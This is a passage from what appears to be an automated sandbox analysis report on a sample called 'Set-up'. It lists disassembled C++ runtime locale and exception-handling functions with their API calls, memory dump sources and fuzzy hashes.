                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3ED17,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC3D1B9
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC3D1C2
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • ?_Getcat@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP100(?,?,00000000,00000000,00000014,6BC3ED17,?,0000000C,6BC3962C,?,?,?,?,?,?,?), ref: 6BC3D1DC
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3ED17,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?), ref: 6BC3D1F0
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC3D1FF
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3ED17,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC3D20F
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC3D215
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3ED17,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC3D222
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_Getcat@?$time_get@_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowU?$char_traits@_V42@@V?$istreambuf_iterator@_Vfacet@locale@2@W@std@@@std@@@std@@std::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 3858954810-3145022300
                                                                                              • Opcode ID: ae52c1b4fbc156728ae97d7aa500d89042c90485d180122465ab8708b8c61042
                                                                                              • Instruction ID: fdb7b94ec754cd7017278d91929e282c4c8e6304af7ca0561f8788b7b6dcef7f
                                                                                              • Opcode Fuzzy Hash: ae52c1b4fbc156728ae97d7aa500d89042c90485d180122465ab8708b8c61042
                                                                                              • Instruction Fuzzy Hash: 7601A13196062997CF05DBB0C852AAD7335BF81724F940528E020BB290FF3C9B019B61
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC26198
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC261A2
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC261B9
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC261C2
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • codecvt.LIBCPMT(?,?,00000000,00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58), ref: 6BC261DC
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?), ref: 6BC261F0
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC261FF
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?), ref: 6BC2620F
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC26215
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?), ref: 6BC26222
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowcodecvtstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 1669975708-3145022300
                                                                                              • Opcode ID: 800f1f171e7632fbafd4b4741ef57b0277ed3f117c38d397d661c720a79b3666
                                                                                              • Instruction ID: b5d286540e690a5710a1a28c0cce365cbadec11abed0e4054808789f2ba82e34
                                                                                              • Opcode Fuzzy Hash: 800f1f171e7632fbafd4b4741ef57b0277ed3f117c38d397d661c720a79b3666
                                                                                              • Instruction Fuzzy Hash: AA016D3192462997CF05DBB4C856AEEB3357F81729F540568E120BB290FF3C9B059B61
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC41147
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC41A1C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F,?,00000000), ref: 6BC41151
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC41A1C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F,?,00000000), ref: 6BC41168
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC41171
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • codecvt.LIBCPMT ref: 6BC4118B
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC41A1C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F), ref: 6BC4119F
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC411AE
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC41A1C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F,?), ref: 6BC411BE
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC411C4
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC41A1C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F,?), ref: 6BC411D1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowcodecvtstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 1669975708-3145022300
                                                                                              • Opcode ID: 3543f4ba89e182695ccb650966190b315c00100d619acec939be0212eb9d53f2
                                                                                              • Instruction ID: 73cf263af1a8d33c900bba58d2c9bb1cdbba3f5527c9165d0dcbd92954a4f3b3
                                                                                              • Opcode Fuzzy Hash: 3543f4ba89e182695ccb650966190b315c00100d619acec939be0212eb9d53f2
                                                                                              • Instruction Fuzzy Hash: 1301A1319205299BCF01DBB4C952AEE7731BF81724F540129E161BB2A0FB3C9B059B61
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC260F5
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3EF51,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC260FF
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3EF51,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC26116
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC2611F
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • codecvt.LIBCPMT(?,?,00000000,00000000,00000014,6BC3EF51,?,0000000C,6BC39639,?,?,?,?,?,?,?), ref: 6BC26139
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3EF51,?,0000000C,6BC39639,?,?,?,?,?,?,?,?), ref: 6BC2614D
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC2615C
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3EF51,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC2616C
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC26172
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3EF51,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC2617F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowcodecvtstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 1669975708-3145022300
                                                                                              • Opcode ID: bd93268593b89e9f31f2bd400e6067110fb78c5b7dbe1ce375ea84f20a003269
                                                                                              • Instruction ID: 13d3950a165ee143a34c34f074a451abdc21c9cf3dd78683a2da5bf98fac0a83
                                                                                              • Opcode Fuzzy Hash: bd93268593b89e9f31f2bd400e6067110fb78c5b7dbe1ce375ea84f20a003269
                                                                                              • Instruction Fuzzy Hash: A6016D31920A299BCF05DBB0C852AEEB7357F81725F500568E121BB2D0FB3CAB059B61
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC3D0F5
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3ECA5,?), ref: 6BC3D0FF
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3ECA5,?), ref: 6BC3D116
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC3D11F
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • moneypunct.LIBCPMT ref: 6BC3D139
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3ECA5,?), ref: 6BC3D14D
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC3D15C
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3ECA5,?), ref: 6BC3D16C
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC3D172
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3ECA5,?), ref: 6BC3D17F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowmoneypunctstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 3875917587-3145022300
                                                                                              • Opcode ID: 71e1ebd457ac72c4642a342bd21e9bc8faefdc1ea6e95f26467d83515282fe4e
                                                                                              • Instruction ID: a5ebd35707a06ab8649d9be86775beda09dda2dd34fa7220d128495bfeeb53c2
                                                                                              • Opcode Fuzzy Hash: 71e1ebd457ac72c4642a342bd21e9bc8faefdc1ea6e95f26467d83515282fe4e
                                                                                              • Instruction Fuzzy Hash: 700161319606299BCF05DBB4C852AEE7335AF81724F950569E120BB2A0FB3C9B05DB61
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC410A4
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC419AF,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F,?,00000000), ref: 6BC410AE
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC419AF,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F,?,00000000), ref: 6BC410C5
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC410CE
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • messages.LIBCPMT ref: 6BC410E8
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC419AF,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F), ref: 6BC410FC
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC4110B
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC419AF,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F,?), ref: 6BC4111B
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC41121
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC419AF,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?,0000003F,?), ref: 6BC4112E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowmessagesstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 4221931714-3145022300
                                                                                              • Opcode ID: 048277daccd68af607787532dd2bfe575a5a076cfddfee85164190cdd99cb4f2
                                                                                              • Instruction ID: 2a79690bac04b106b16a2ee9b61016ead3d2aefa3b763fe84d28690316950532
                                                                                              • Opcode Fuzzy Hash: 048277daccd68af607787532dd2bfe575a5a076cfddfee85164190cdd99cb4f2
                                                                                              • Instruction Fuzzy Hash: 2301C0319206299BCF01DBB4C852AAEB731BF85724F540528E161BB2D0FF3C9B01DB61
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC3D052
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3EC23,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC3D05C
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3EC23,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC3D073
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC3D07C
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • moneypunct.LIBCPMT ref: 6BC3D096
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3EC23,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?), ref: 6BC3D0AA
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC3D0B9
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3EC23,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC3D0C9
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC3D0CF
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3EC23,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC3D0DC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowmoneypunctstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 3875917587-3145022300
                                                                                              • Opcode ID: 93ae65f31fe9ca05cb227ef534459e943990130461d2cce61a4cff3fd01c75e9
                                                                                              • Instruction ID: d0ecf422d05f8e4ae02902af8162125574996dac1e8f1b9cc017bd1bc577a47c
                                                                                              • Opcode Fuzzy Hash: 93ae65f31fe9ca05cb227ef534459e943990130461d2cce61a4cff3fd01c75e9
                                                                                              • Instruction Fuzzy Hash: BC01A13192062997CF05DFB4C856AAD7731BF81724F940529E0207B290FB3C9B029B61
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC26052
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3E96F,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC2605C
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • int.LIBCPMT(00000000,00000014,6BC3E96F,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC26073
                                                                                                • Part of subcall function 6BC1B99B: std::_Lockit::_Lockit.LIBCPMT(00000000), ref: 6BC1B9AE
                                                                                                • Part of subcall function 6BC1B99B: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000), ref: 6BC1B9C8
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 6BC2607C
                                                                                                • Part of subcall function 6BC1BBFD: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(00000000,?,6BC412BC,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A), ref: 6BC1BC20
                                                                                              • codecvt.LIBCPMT(?,?,00000000,00000000,00000014,6BC3E96F,?,0000000C,6BC3962C,?,?,?,?,?,?,?), ref: 6BC26096
                                                                                              • ??0bad_cast@std@@QAE@PBD@Z.MSVCR100(bad cast,00000000,00000000,00000014,6BC3E96F,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?), ref: 6BC260AA
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CA64), ref: 6BC260B9
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000000,00000014,6BC3E96F,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC260C9
                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 6BC260CF
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3E96F,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC260DC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??1_LockitLockit::_Lockit@std@@std::_std::locale::facet::_$??0bad_cast@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3IncrefLocimp@12@MtxlockRegisterThrowcodecvtstd::locale::_
                                                                                              • String ID: bad cast
                                                                                              • API String ID: 1669975708-3145022300
                                                                                              • Opcode ID: a131b81d04ae9bca6c11470e5d059c52ae8cdd975ab56572a52545c181f64a59
                                                                                              • Instruction ID: d99c8ade957a392f9f345a6bd41ac1b4005896ba14aed06cc27c864a2bf4fda7
                                                                                              • Opcode Fuzzy Hash: a131b81d04ae9bca6c11470e5d059c52ae8cdd975ab56572a52545c181f64a59
                                                                                              • Instruction Fuzzy Hash: 7501A1319206299BCF05DBB0C952AAE7331BF81724F500129E121BB290FF3C9B01AB61
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC40DBB
                                                                                              • _Getcvt.MSVCP100(00000008,6BC413C9,00000000,00000001,00000028,6BC4151D,?,?,00000000,00000000,00000014,6BC41B0D,?,00000008,6BC3961F,?), ref: 6BC40DC5
                                                                                                • Part of subcall function 6BC3AD4D: ___lc_handle_func.MSVCR100 ref: 6BC3AD50
                                                                                                • Part of subcall function 6BC3AD4D: ___lc_codepage_func.MSVCR100 ref: 6BC3AD59
                                                                                              • localeconv.MSVCR100 ref: 6BC40DD2
                                                                                              • _Maklocstr.LIBCPMT ref: 6BC40DF0
                                                                                                • Part of subcall function 6BC23503: strlen.MSVCR100 ref: 6BC2350E
                                                                                              • _Maklocstr.LIBCPMT ref: 6BC40E0D
                                                                                              • _Maklocstr.LIBCPMT ref: 6BC40E2A
                                                                                              • _Maklocstr.LIBCPMT ref: 6BC40E47
                                                                                              • memcpy.MSVCR100(?,$+xv,00000004,?,?,?,?,?,?,?,?), ref: 6BC40EC9
                                                                                              • memcpy.MSVCR100(?,$+xv,00000004,?,$+xv,00000004,?,?,?,?,?,?,?,?), ref: 6BC40ED4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
